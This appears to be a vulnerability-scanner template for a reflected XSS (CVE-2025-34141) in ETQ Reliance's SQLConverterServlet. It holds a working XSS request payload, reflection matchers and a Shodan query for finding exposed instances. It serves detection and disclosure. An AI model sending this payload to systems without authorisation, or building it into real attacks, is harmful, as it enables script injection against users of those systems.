info: name: ETQ Reliance Reflected XSS via `SQLConverterServlet` author: slcyber,pdresearch severity: medium description: | A reflected cross-site scripting (XSS) vulnerability exists in ETQ Reliance CG (legacy) platform within the `SQLConverterServlet` component. This vulnerability requires user interaction, such as clicking a crafted link, and may result in execution of unauthorized scripts in the user's context. The affected servlet was unnecessarily exposed to authenticated users and has since been disabled in version SE.2025.1. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-34141 - https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/ metadata: verified:true max-request:1 shodan-query: html:"ETQ Reliance" tags: cve,cve2025,etq-reliance,xss
-raw: - | GET /reliance/SQLConverterServlet?MySQLStm=%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1 Host: {{Hostname}}
matchers: -type: word part: body words: - '</textarea><img src=x onerror=alert(document.domain)>' - 'You have to start the ENGINE application before using this form.' condition: and